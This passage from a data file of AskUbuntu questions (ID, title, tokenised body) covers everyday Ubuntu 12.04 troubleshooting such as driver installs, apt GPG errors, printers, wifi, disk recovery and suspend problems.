or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory fatal : could not load /lib/modules/3.5.0/modules.dep : no such file or directory errors were encountered while processing : nvidia-current e : sub-process /usr/bin/dpkg returned an error code ( 1 )
198340	is short-cut ctrl-alt-esc switched off ?	here is 12.04.01 lts there is top and kill -9 pid but the quicker shortcut is not working like : ctrl-alt-esc it is switched off ?
198341	how do i save a .php file in /var/www ?	i am trying to start working with lamp . i installed php , mysql , apache and phpmyadmin . now when i try to save or write to a .php file in /var/www i get the following error : gedit could not back up the old copy of the file before saving the new one . you can ignore this warning and save the file anyway , but if an error occurs while saving , you could lose the old copy of the file . save anyway ? but when i save anyways the option does n't work.. please help
198345	wine not working ?	i tried installing a poker app , from this site i downloaded the file , clicked install using wine ( i have the latest version of wine ) the installation completed ok , but when i try to open the app , it opens , then almost immediately shuts down..does anyone know what i 'm doing wrong ?
198347	internet connection crashes while wifi / lan stay connected	i am connected to a router by wifi or lan . but every few moments ( sometimes seconds , sometimes half an hour ) my connection to the internet breaks down . so in one moment i can surf with my firefox and have ping times of 20 ms ( wifi ) to the google server . and in the next moment i ca n't open any pages in any browser and the ping shows no new messages first and then `` destination host unreachable '' . this is especially odd as another computer or my smart phone stays connected at the same time to the same network and seems to notice nothing . so i have a problem independend of wifi or lan drivers but with something else . where should i look for logs that could tell me more information ? i ca n't find some in syslog . just if i reconnect to the router ( wich works for another few moments ) there are a lot of informations . but everythin is okay then .
198351	very heavy .pdf file . how to handle it ?	i should print this file on paper , but it is heavy ( 2,3 mb ) and the printing process is very slow . but this is not the whole problem . i should first create another .pdf file ( grayscale ) with four pages on each sheet . when i try to print this file as a .pdf file , the process of creation of the new file is even slower than the printing process , and the output file is much heavier than the original ( hundreds of megabytes ) . how can i shrink the pdf file ? is there a way to create a printer friendly .pdf version of the file ? before you ask , i ca n't simply print it on pages . i must create this .pdf file with four pages on each sheet .
198352	ftp wo n't open a connection to client	i am running windows server 2008 on ubuntu server 12.04.1 via devstack and i am trying to download a file from an ftp server using the windows command line ftp client . when i run the ftp get command i get the following error message : 500 i wo n't open a connection to 10.0.0.2 ( only to xx.xx.xx.xx ) 425 no data connection 10.0.0.2 is the internal ip address of the instance , whereas xx.xx.xx.xx is the external address . is there anyway to make the ftp client use the external address for the data connection , or alternatively have the client establish the connection ? thanks
198353	automatically change resolution when not in dock	i have ubuntu 11.04 ( yep , i know it 's old news ) on my lenovo w520 . at home , i have a dock with dual monitors . i have a pretty decent setup - things work almost perfectly ( hence the reason i 'm reluctant to upgrade ... that and i 'm not 100 % sold on unity ) . anyway , the only annoyance i have is that when i 'm on travel , i use the laptop screen . when i un-dock the laptop , i need to manually go into nvidia x-server settings and change the resolution from 'auto ' to 1920x1200 , or it will think i have two screens , and my mouse pointer will be able to go way off the left side of the screen . this is n't a big deal , but i need to do it every time i restart the x-server ( so if i reboot , or have to kill it , etc ... ) what would be really nice is if there was a way for it to automatically detect whether or not there is external monitors ( which it seems to do already ) , and switch into the mode i select , depending on which monitors are connected . is there any way to accomplish this ? i 've posted my xorg.conf file for reference . # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 270.29 ( buildd @ allspice ) fri feb 25 14:42:07 utc 2011 # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 275.19 ( buildmeister @ swio-display-x86-rhel47-07.nvidia.com ) tue jul 12 18:35:38 pdt 2011 # section `` monitor '' # identifier `` monitor1 '' # vendorname `` lenovo '' # modelname `` thinkpadlcd '' # # horizsync 28.0 - 33.0 # # vertrefresh 43.0 - 72.0 # # option `` dpms '' # endsection section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` dell u2410 '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro 1000m '' option `` registrydwords '' `` enablebrightnesscontrol=1 '' endsection section `` screen '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+120 , dfp-6 : nvidia-auto-select +1920+0 '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +0+120 , dfp-5 : nvidia-auto-select +1920+0 '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +1920+419 , dfp-5 : nvidia-auto-select +3840+0 , dfp-6 : nvidia-auto-select +0+0 '' # removed option `` metamodes '' `` dfp-5 : nvidia-auto-select +0+0 , dfp-6 : 1920x1200 +1920+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` nologo '' `` true '' option `` twinviewxineramainfoorder '' `` dfp-0 '' option `` twinview '' `` 1 '' option `` metamodes '' `` dfp-5 : nvidia-auto-select +1920+0 , dfp-6 : 1920x1200 +0+0 '' subsection `` display '' depth 24 endsubsection endsection
198355	get selected object from treeview	i 've been working on a minor ( first time ) app with quickly and hit a hurdle - how do i get the selected row ( the data ) from a treeview ? the data to the treeview is passed from a list of files in a directory , and i need to know which rows were selected ( and thus which files were ) . what is the best way to do that ? here 's the current code : self.treeview = self.builder.get_object ( `` treeview '' ) select = self.treeview.get_selection ( ) select.connect ( `` changed '' , self.on_tree_selection_changed ) def on_tree_selection_changed ( selection ) : model , treeiter = self.treeview.selection-get ( ) if treeiter ! = none : print `` you selected '' , model [ treeiter ] [ 0 ]
198356	thunderbird opens twice always	i have thunderbird on ubuntu 12.04 and every time i open it , it loads twice . two windows are opened . to be clear , if i have thunderbird closed ( not minimized ) and click on mail , in the tray bar , it opens 2 main windows . i have had installed several add-ons , including firetray and `` minimize to tray revived '' , but now i have removed all of them . actually i can disable all the add-ons and it still happening . any ideas ?
198358	how to run ubuntu tweak 's janitor automatically ?	my aim is to have the janitor running at startup , with a pre-configured profile ( e.g . clean old packages and empty the browser cache ) , much like ccleaner 's /auto parameter on windows . the website is lacking any documentation or usage instructions , and i could not find any information on this here on askubuntu as well . i tried , naturally , to start ubuntu tweak from the command line , hoping additional api exists that will come through in this ( allegedly ) simple task . i only got as far as : ubuntu-tweak -f janitor which is a step in the right direction , but what 's still missing is a command for the clear action . is such a command available , or is there any better way of achieving the described behavior ?
198363	how to install canon mp610 printer on ubuntu 12.04 x64	i 'm running 64 bit ubuntu , but my canon printer driver 's only come in 32 bit . how can i install a canon mp610 in 64-bit ubuntu ? i 've tried : adding repository like it is written here : http : //www.iheartubuntu.com/2012/02/install-canon-printer-for-ubuntu-linux.html it did not work ; the printer was installed but every print job goes somewhere unknown ( probably to /dev/null ) installing ia32-libs via 'sudo apt-get install ia32-libs' this also did not work ( it was already installed )
198370	ca n't launch nautilus	i 'm unable to launch nautilus . if i launch it from a terminal , it says : nautilus : error while loading shared libraries : libunity-protocol-private.so.0 : can not open shared object file : no such file or directory when i ld_preload this lib , this does work , but i want the solution to be permanent . does someone has a clue to that ? thanks .
198371	apt encounters errors with bad gpg keys	i always have been a windows guy but with my recent interesting and degree ( microbiology ) of bioinformatics i am finding a need for the command line and higher computational power . i am making the full conversion to ubuntu 12.04 lts and honestly just need help setting it up for my/it 's first time . i lack the command line knowledge to navigate some problems . first off i keep getting a handful of errors withing sudo apt-get update reading package lists ... error ! w : gpg error : http : //us.archive.ubuntu.com precise release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : htt : //security.ubuntu.com precise-security release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : htt : //extras.ubuntu.com precise release : the following signatures were invalid : badsig 16126d3a3e5c1192 ubuntu extras archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : htt : //us.archive.ubuntu.com precise-updates release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : htt : //us.archive.ubuntu.com precise-backports release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_precise_restricted_binary-amd64_packages e : the package lists or status file could not be parsed or opened . secondly , i have various random problems with the new os . i click on the `` ubuntu software center '' and it opens then crashes without a error box : '' ubuntu has encountered an internal error '' that ca n't show details
198374	problem with ad-hoc wifi option	i have internet access by ethernet and i want to use my notebook as a wifi point . i want to have internet access on various devices , too . i am trying to make my notebook as wifi access point by using ad-hoc option . i did everything like in this movie http : //www.youtube.com/watch ? v=gavnh8tsfeu . i suppose i did everthing ok , according the advices - i checked it a few times . when configuration of ad-hoc network is finished , then my wifi detector going mad . ubuntu tries to get access to ad-hoc network and it can but only four about 3 seconds . after that there is disconnected . ubuntu tries to get access again and again . in general it seems like this : ubuntu informational cloud on my desktop still shows information about connect and disconnet to ad-hoc network alternately . without any break . connected , disconnected , connected , disconnected . does anyone have any idea how can i fix it and create my ad-hoc network as stable thing ? thanks
198376	can not boot into 12.04 just flashing cursor	i have a dual boot ubuntu 12.04 and windows xp pro ( almost never use the windows though ) . been having some troubles with the machine getting very sluggish lately . consider a poss overheating prob , then recently discovered the main system drive had some bad sectors and had a fail warning in disk utility . backed up the whole ubuntu set up so not overly worried , and actually not sure if thats the issue . now ca n't boot at all , except into windows . even trying it with the live cd keep going right back to the flashing cursor . in windows i can access all the drives ( 3 of em ) and even see the ubuntu partitions chi , xp management says are ok . puzzled . any ideas ?
198377	my localhost/phpmyadmin is being directed to my site with .htaccess	i have a http : //domain/ . the lamp installation guide on the ubuntu site is incredibly easy to follow and i have only experienced my issue this one time ... when i navigate to domain/phpmyadmin i 'm getting my sites homepage . my .htaccess file has errordocument 404 / which is redirecting it . i 'm not sure what i should check to fix this . like i said , i 've never had any problems until this installation - my .htaccess + phpmyadmin never gave me a problem before . i 've tried reinstalling phpmyadmin using synaptic package manager , which usually fixes these weird missing file situations . any suggestions ? let me know if you need more info.. thanks !
198378	how do i uninstall ubuntu , when the traditional ways fail ?	i want to remove ubuntu from my computer , and i cant figure out how to do it . i have tried to go to uninstall programs , and did not find it on the list , and the file uninstaller-wubi does nothing . what do i do ?
198384	how do i install utorrent ?	i have tried all the tutorials to install utorrent , but i still ca n't get any of them to work . they are all identical . basically , you get the .tar.gz file , unzip it to /opt/ , mark it as executable , link it to /usr/bin/utserver , install libssl0.9.8 , and run it . i 've done all this , but here 's what i get : utserver -settingspath /opt/utorrent-server-v3_0/ bash : /usr/sbin/utserver : no such file or directory so , i tried this : sudo ln -s /opt/utorrent-server-v3_0/utserver /usr/sbin/utserver ln : failed to create symbolic link `/usr/sbin/utserver ' : file exists so , the utserver command says that the directory/file does n't exist , but the ln command says it does . what 's the problem ? ( i 've already tried rebooting . for a while after a reboot , the command utserver does n't return any errors ; it just exits . )
198391	ca n't install libapache2-mod-php5	when i try to install libapache2-mod-php5 , i get an error : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : libapache2-mod-php5 : depends : apache2-mpm-prefork ( > 2.0.52 ) but it is not going to be installed or apache2-mpm-itk but it is not going to be installed e : unable to correct problems , you have held broken packages . i have tried apt-get clean , update and upgrade , as well as -f install , and no change . is there a way to fix this , or is there an easy way to manually install the php plugin ?
198394	i 'm getting a black screen right after install ubuntu option on grub menu . any ideas ?	i 've formatted my usb and remade the live usb twice . i tried editing editing the commands ( pressing the 'e ' key while the command was highlighted on the grub menu ) by deleting quiet splash and replacing it with nomodeset adding nomodeset right before quiet splash deleting quiet splash and adding radeon.modeset=0 i saw another solution for a fix by editing grub but in command line sudo nano and update-grub all show up as unknown commands . i 'm brand new to ubuntu , in case you could n't tell . i would appreciate any help you could give me . i want to convince my brother that ubuntu is a better option than ios but i ca n't do that if i ca n't install it . if you need more information , please ask . i 'm not dual booting . i want this to be a full install . thanks .
198395	how can a web developer contribute to ubuntu ?	i 've done web development for the past ten years , and have used ubuntu for my operating system for the past five . i feel like my design and development skills could be useful , but do n't know how i can help with experience in web development . i 'm currently versed in ruby , php , coldfusion , and javascript , and i took a java class in college . i 'm also willing to learn a new language , but do n't even know where to start as far as what would be most helpful to the ubuntu community . are there projects that a web developer could help with in ubuntu ? or what language should i learn to best help contribute ?
198396	how to play mp3 in rhythm box	got an error while downloading restricted extras . [ to install restricted extras , these items must be removed . ] `` libav codec library ; libav utility library '' can you please help me ?
198397	ubuntu 12.04 unity/gnome software	the software center shows f-spot photo manager as software for the gnome desktop . is there an equivalent software for the unity desktop ?
198412	drivers for geforce 7300 gs ?	i have been searching everywhere ! ! ! ! ! and i can not seem to find a driver for my geforce 7300 gs video card . if i do n't get it , the android sdk emulator wo n't work . i get this error while starting the emulator up : x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 154 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 i looked up anything and everything , and the results i got was to get a video card driver , which i can not find . any help is appreciated . thanks !
198414	where can i find the supported way to deploy hadoop on precise ?	i want to set up a small ( 6 node ) hadoop/hive/pig cluster . i see the work in the juju space on charms ; however , the current status of deploying a single charm per node will not work for me . i see serverteam hadoop which talks about re-packaging the bigtop packages . the cloudera cdh3 installation guide talks about maverick and lucid , but not precise . what am i missing ? is there a straight forward way to deploy hadoop/hive/pig on 6 nodes that does not involve building from tarballs ?
198416	how do i make the refresh rate stick in aticonfig ?	so , i have an htpc hooked up to my tv . i can set the refresh rate to 60 hz through the catalyst control center and 60 hz is fine for me ) , but if i reboot , it goes back to 30 hz . how do i get this to stick ? i could hack it with an xrandr script , but i 'd rather not .
198417	how do i sync music to my sony walkman ( z series ) using rhythmbox ?	i have recently purchased the new walkman z from sony . i can transfer music by mounting it as a drive , but i would prefer to use rhythmbox to do so . my other android devices and mp3 players from the past have always just shown up without any tweaking . using nautilus to transfer the files is possible but for some reason nautilus still makes a trash folder on removable drives . deleting the trash folder anew is really annoying to do every time i delete music from the device . how can i use rhythmbox to transfer and remove songs instead ?
198423	ubuntu 12.04 live cd installation process is extremely slow	it is on an older dell laptop ( inspiron 1150 ) but it has 512mb ram , nvidia geforce and an upgraded cpu . i am not an idiot and do not expect good performance on this os but i just want to try it out and see if it is the right os for college . i have booted this laptop in other linux distros such as slitaz and dsl . i suspect the problem has to do with drivers but unsure exactly what i should do . laptop does not have internet access ( it 's ieee 802.11a only )
198425	windows minecraft on ubuntu	i 've got a minecraft version for windows , which runs with an .exe file . i 've tried to make it run with java directly and it did n't an ubuntu message appears `` fatal : read error : could not read or parse the jnlp file '' ( show more details ) , when i tried with wine , a wine message appears `` no jvm could be found on your system . please define exe4j_java_home to point to an installed 32-bit jdk or jre or download a jre from www.java.com is there a way i can make it run ? it 's all because i can not make the mods work on my minecraft 's linux version thanks .
198432	reliably restarting services using upstart or runit	i want to reliably restart my app and web server processes on crash . if i understand correctly , runit starts every service as a child process . if the child process crashes this sends a signal to the parent process which in turn respawns the service as a child . how does this work in the case of upstart . does it also spawn a child process like runit ? i am considering using runit for this . is that needed , or is upstart good enough for this ? i am using nginx for my web server and gunicorn ( python ) for my app server .
198434	how to remove microsoft office icons ?	i know that there are countless questions about how to install office and what not . but the issue i have is now that i have installed it onto my system ( and it never worked , just fyi ) i am now stuck with these office icons in the unity browser . has anyone come across this issue and how can i fix this ? i imagine there are some images stored somewhere and i just have to remove them because when i select the program nothing runs .
198435	how to block downgrade of a package using dpkg ?	i want to prevent installation of lower version of the package over higher version using dpkg .
198442	how to install code block ?	i am using 12.04 64 bit ubuntu and i want to install code block ide please guide me ? is there any repository ?
198448	my hard disk suddenly full	i am a ubuntu beginner and i started to use ubuntu 12.10 beta 2 last week . i found that my hard disk is full . it seems the disk does not mounted correctly . however , i have tried a lot of codes but they do n't work at all . thanks for your help . peng @ peng-thinkpad-sl410 : ~ $ df 文件系统 1k-块 已用 可用 已用 % 挂载点 /dev/sda1 238304896 230078604 5805240 98 % / udev 1022532 4 1022528 1 % /dev tmpfs 412108 884 411224 1 % /run none 5120 8 5112 1 % /run/lock none 1030264 1152 1029112 1 % /run/shm none 102400 36 102364 1 % /run/user translation : 文件系统 = file system 1k-块 = 1-k blocks 已用 = has been used 可用 = available 已用 % = use % 挂载点 = mount point
198450	restoring refit on macbook air	my macbook air dual boots mac os x and ubuntu precise . normally when you turn it on the first thing you see is the refit menu which allows you to select which os to boot . if you select ubuntu then grub will show up next , though grub can not boot mac os x . last friday i restarted ubuntu and it skipped straight to grub . i 've restarted it a few times and it seems that refit will not show up anymore . how can i fix this so i can boot into mac os x again ?
198452	no host only adapter selected	i have a problem with my virtualbox on ubuntu 12.04 , i ca n't add a host only adapter , the message is `` no host only network adapter selected '' i ca n't select anything can anyone solve this problem ? ?
198453	is there a microsoft office theme for libreoffice ?	is there a microsoft office 2007/2010 theme for libreoffice ? the interface of libreoffice slightly confuse me .
198455	has anything happened to the updates on ubuntu 11.10 that screwed up the adobe flashplayer plugin ?	for some reason i cant watch youtube videos and i have no idea how to update the flashplayer . i have just updated everything using the update manager and the videos wont play anymore or i get an error message that i need the flash player plugin . why is this ?
198456	rapidminer on ubuntu 12.04	i have fairly standard ubuntu 12.04 and i would like to use rapidminer . there are neither official packages for rapidminer nor unofficial ppas . when i download it from the official website and ran java -jar lib/rapidminer.jar i get the following log : oct 10 , 2012 9:10:34 am com.rapidminer.tools.parameterservice init info : reading configuration resource com/rapidminer/resources/rapidminerrc . oct 10 , 2012 9:10:34 am com.rapidminer.tools.i18n < clinit > info : set locale to en . oct 10 , 2012 9:10:35 am com.rapid_i.launcher ensurerapidminerhomeset info : property rapidminer.home is not set . guessing . oct 10 , 2012 9:10:35 am com.rapid_i.launcher ensurerapidminerhomeset info : trying parent directory of '/home/izidor/projects/rapidminer/lib/rapidminer.jar ' ... gotcha ! oct 10 , 2012 9:10:38 am com.rapidminer.parameter.parametertypepassword decryptpassword warning : password in xml file looks like unencrypted plain text . oct 10 , 2012 9:10:40 am com.rapidminer.tools.jdbc.jdbcproperties < init > warning : missing database driver class name for odbc bridge ( e.g . access ) oct 10 , 2012 9:10:40 am com.rapidminer.tools.jdbc.jdbcproperties registerdrivers info : jdbc driver ca.ingres.jdbc.ingresdriver not found . probably the driver is not installed . oct 10 , 2012 9:10:40 am com.rapidminer.tools.jdbc.jdbcproperties registerdrivers info : jdbc driver oracle.jdbc.driver.oracledriver not found . probably the driver is not installed . and the splash screen freezes at the stage loading icons while using 100 % of cpu . how to make rapidminer to run on ubuntu ?
198465	broken installation support	i was installing a robotino package with ubuntu software center . but then , uscenter hanged for so long so i kill uscenter with `` kill pid '' it 's bad that i can not recover the broken installation to install again with either uscenter or dbpk i already deleted the 'lock ' file and use 'apt-get clean/autoclean/autoremove ' but all failed what can i do now to reinstall again the package ? ?
198466	updating driver for dwa 160 ubuntu for ubuntu 12.04	i have used this website to install the driver for dwa-160 http : //bernaerts.dyndns.org/linux/229-ubuntu-precise-dlink-dwa160-revb2 lately i 've been having some trouble with updating eclipse so it no longer recognizes my adt plugin and i need to reinstall . will there be a way in the future to reinstall these drivers for the dwa-160 that is much easier and less time consuming ? i made a script to install all the software i want like vlc etc , but to follow the guide above everytime i need a fresh install of ubuntu sounds tiring
198474	how to delete old versions of same packages from a local repository ?	in my local repository see below , i have many versions of same packages downloaded and stored in deb package directory . as ubuntu always prefer to use the highest version , i do n't need the earlier versions downloaded and used . ( all are in a same folder ) . how can i delete the earlier versions of packages from my local deb 's folder ? it is not a feasible solution to delete them manually . ( you ca n't examine the versions in thousands of files ) any ideas ? ! ! maybe a script that checks the version of each package keeping the newer version and deletind older ones can solve this issue . i am seeking for such script or if some software is founded would be great i have made my local repository following this how to tutorial . *** a local repository is an offline storage of packages already downloaded , so that you do n't need to download it again ) note : i 'm not referring to clearing the cache of downloaded packages , which can be done with apt-get clean command .
198477	how do i install turbo c++ ?	i am used to turbo c++ and i am new to ubuntu . i really need turbo c++ to get started . can somebody please help me to install turbo c++ on ubuntu .
198485	how to write debian/changelog to allow build package other people	i 've created simple debian package which i am building using bzr bd . the problem is my colleague is unable to build this package using this method , without changing changelog 's email to her own , so the gpg signing passed . we are working together on the same project and want to have possibility to build this package for each own . i am not using debuild to build package - only bzr bd . and this is my private package not in launchpad . any idea ?
198489	kubuntu - roccat keyboard does not work under grub and works partially in bios	the system specification grub boot loader os : windows 7 / kubuntu 12.04 lts keyboard : roccat isku motherboard : msi z77 mpower with the latest bios ssd/hdd : kingston hyperx 3k ( ahci in bios enabled ) , 2 other hdds i will provide more specific configuration if needed . the problem as stated in the topic i can not navigate in the grub menu using mentioned keyboard ( there is no problem when i use logitech k360 ) . i have tried both usb 2.0 and usb 3.0 ports . i can not enter bios menu as well , however if i enter it using other keyboard , roccat seems to work and i can navigate in the bios menu without any issues . any ideas how can i fix that problem ?
198491	repair ext4 filesystem on usb drive	yet another filesystem question . i wanted to use a usb drive that i had n't mounted for a month or so and was surprised by the fact ubuntu was unable to mount it . i looked it up in the disk utility and it said it discovered a device with 17 mb instead of 2 gb . the hardware looks intact , i hope for the best for repairing the ext4 filesystem . i followed the instructions from howto : repair a broken ext4 superblock in ubuntu , but i was n't successful . # fsck.ext4 -v /dev/sdb e2fsck 1.42.5 ( 29-jul-2012 ) ext2fs_open2 : bad magic number in super-block fsck.ext4 : superblock invalid , trying backup blocks ... fsck.ext4 : bad magic number in super-block while trying to open /dev/sdb the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 filesystem blocks are invalid , however when i run the recommended solution to try the alternate superblock , i get the following output : # e2fsck -b 8193 /dev/sdb e2fsck 1.42.5 ( 29-jul-2012 ) e2fsck : invalid argument while trying to open /dev/sdb plus the same error message as in the last paragraph above . any ideas how to recover the drive ? thank you very much ! edit : testdisk wo n't help . i 'm still stunned why the tools only discover 17 mb . the gparted feature `` attempt data rescue '' yielded no results , no filesystems were identified . @ colin according to disc utility , the device is unpartitioned , i can only deal with devices at the moment . it 's the question if the partition table or the filesystem is damaged . running fsck with partition gives fsck.ext2 : no such file or directory while trying to open /dev/sdb1 possibly non-existent device ? @ john # sudo dd if=/dev/sdb bs=512 count=1 | hd 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 1+0 records in 1+0 records out 512 bytes ( 512 b ) copied , 0.00307007 s , 167 kb/s 00000200 since all are zeros , this means no remains of mbr ? the result was there quite quick . sudo hd /dev/sdb | less 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 01000000 it 's all zero . i guess the pendrive broke down lying in a drawer in a magical , unexplainable way .
198492	how can i show notes on my laptop in libreoffice impress ?	i think it would be very nice to present on a projector with my laptop showing the notes ! i appreciate any help and i love you if you find it until tomorrow !
198493	what happens to my swap space if i choose to replace windows with ubuntu ?	when i install ubuntu 12.04 , i 'll be presented with three options : install ubuntu alongside windows , replace windows with ubuntu and something else . if i choose 'replace windows ' , then i can not make a swap space . so what then ? i 've 1gb ram . will only my c drive get replaced or what will happen ? if only c drive is affected , then will data on the other 2 drives get saved ? if yes , how can i access it ( on which drive of ubuntu ) after installing ubuntu ?
198494	banshee music file copy to mac iphone 4s ios5.1 not permanent	in ubuntu 12.04 , when i drag .mp3 files from banshee 2.6 to my mac-formatted iphone 4s ios5.1 : banshee says it 's syncing with the phone , updating the media database , and the file count on the phone is incremented ; the files show up under the device in banshee and i can play them ; i can see them on the iphone in a file browser ; i can navigate to the iphone filesystem in a terminal and create a file , so i know i have write permissions . when i disconnect the device in banshee , it again tells me it 's syncing the phone and updating the media database , but i ca n't find the songs on the phone in itunes - they are not there when i reconnect the phone to my computer . am i just being deceived by gvfs ? i have n't been able to find a recent post indicating the status of syncing ios5.x devices with banshee , rhythmbox , etc ... can someone tell me if this should work ? also , i wonder if my iphone needs to be formatted/initialized by itunes for windows , since it has been managed on a mac ? i solved a syncing problem with an older ipod classic which had been managed by itunes on a mac , by re-initializing it under itunes for windows - perhaps an hfs+ issue .
198495	why does n't my computer resume after sleeping overnight ?	i 'm having a weird , weird bug that 's been haunting me since 11.10. if i listen to music or watch a video and my computer automatically goes to sleep at night , it wo n't properly resume in the morning . otherwise , suspend and resume works just fine . what happens is that the wi-fi and bluetooth indicator ( that turns from white to orange when suspending ) stays orange , the display does n't turn on , and the only option i have is to hard reset the machine . here 's what i 've tried so far : installing ( and uninstalling and reinstalling ) laptop-mode-tools switching the proprietary wireless driver ( broadcom-wl ) to the open source one ( brcmsmac & bcma ) and back unloading ( and blacklisting ) all bluetooth modules ( rfcomm , btusb , bnep , bluetooth ) and stopping the bluetooth service ( # stop bluetooth ) and disabling ( # echo 'manual ' > /etc/init/bluetooth.override ) the bluetooth service creating a custom pm sleep action as suggested here : http : //ubuntuforums.org/showthread.php ? p=11926504 not watching youtube / any stuff that uses flash before going to sleep ( i have flashblock , and i checked $ ps aux | grep flash ) because i suspected flash to be the culprit trying out different versions of fglrx ( the one from the repos , then installing the latest one from amd 's site via generated .deb files , then back to the official ones ) looking at /var/log/pm-suspend.log , which reveals that networkmanager failed at putting all network interfaces to sleep , but nothing more . none of these revealed the exact problem . i remember back in the days of 10.04 , there was a gconf key called network sleep : i thought about disabling that , since re-enabling the wireless card seems to be the problem ( according to the indicator led ) , but the option appears to be missing from gnome 3 ( unity-2d , whatever ) . does anyone have any ideas ? thanks , bamdad edit : here 's my dmesg after the hang , after suspending with # sync ; echo 1 > /sys/power/pm_trace ; pm-suspend ( according to https : //wiki.ubuntu.com/debuggingkernelsuspend ) : http : //pastebin.com/uxzt7xp6 edit 2 : it seems that i 'm not alone : http : //ubuntuforums.org/showthread.php ? t=2005943
198499	dual screen is not recognized	i have just installed ubuntu 12.04.1 lts in my computer with 2 monitors , but when i open `` displays '' , just one is shown . im running a nvidia card . if you need anymore information , tell me and ill add it . what am i missing ?
198501	list of all shared folders	is there possible to list all shared folders ( with their physical locations ) from command line ?
198515	docky often dissappears	i use the latest docky for ubuntu 12.04 precise . sometimes it gives me this error : i think it happens when i try to edit the main menu and use synaptic . i 'm not sure . docky is set up to be hidden on a window doge . please give me a patch or a stable version of docky . thanks !
198517	i am unable to type polish characters when connecting via ssh	i 'm running ubuntu server 12.04 on virtualbox . when connecting via console , i am able to type in polish characters just fine ( both on the command line as well as in vim ) . when connecting via putty , i am unable to type polish chars ( altgr+a produces `` a '' instead of the polish char ) i would like the system to remain in english however to also be able to type polish characters via ssh . on putty , under window > translation i set remote char set to utf-8 . i also selected the consoles font with central european script . i tried everything i could find on the internet ( installing the polish language pack , dpkg-reconfigure console-setup ) but nothing seems to work . this is what i have for my locale : lang=en_us.utf-8 language=en_us : en lc_ctype= '' en_us.utf-8 '' lc_numeric= '' en_us.utf-8 '' lc_time= '' en_us.utf-8 '' lc_collate= '' en_us.utf-8 '' lc_monetary= '' en_us.utf-8 '' lc_messages= '' en_us.utf-8 '' lc_paper= '' en_us.utf-8 '' lc_name= '' en_us.utf-8 '' lc_address= '' en_us.utf-8 '' lc_telephone= '' en_us.utf-8 '' lc_measurement= '' en_us.utf-8 '' lc_identification= '' en_us.utf-8 '' lc_all= thank you very much for all your help ! i figured it out and here is the answer ( i ca n't post it since i do n't have enough reputation , spent nearly half a day trying to figure this out and it turned out to be so simple ... ) . here is the answer : i fugured it out , thank you very much for all your help nonetheless ! i have win7 and i had my keyboard set to us . i had to go to control panel > region and language > keyboards and languages and add polish programmer keyboard ( adding polish keyboard but with us layout did n't work ) . i also set the location to poland ( was us ) . this is my work laptop that got rebuilt recently hence i did n't have this set . polish chars via putty seem to be working perfectly fine now ! : )
198523	how to check/display the inklevel of a printer ( canon mg5150 ) ?	my canon mg5150 does n't work neither with inkblot nor with mtink ( epson use ) . i tried two distros : linux mint 13 maya and ubuntu 12.04 lts . i found out that turboprint works , but it 's no alternative for me because it is very expensive and not open source . ink is a package that uses libinklevel5 , it 's available in the repositories but it has no graphical user interface . is there a gnome application based on libinklevel5 that i could use ? can you suggest other packages that might work , too ?
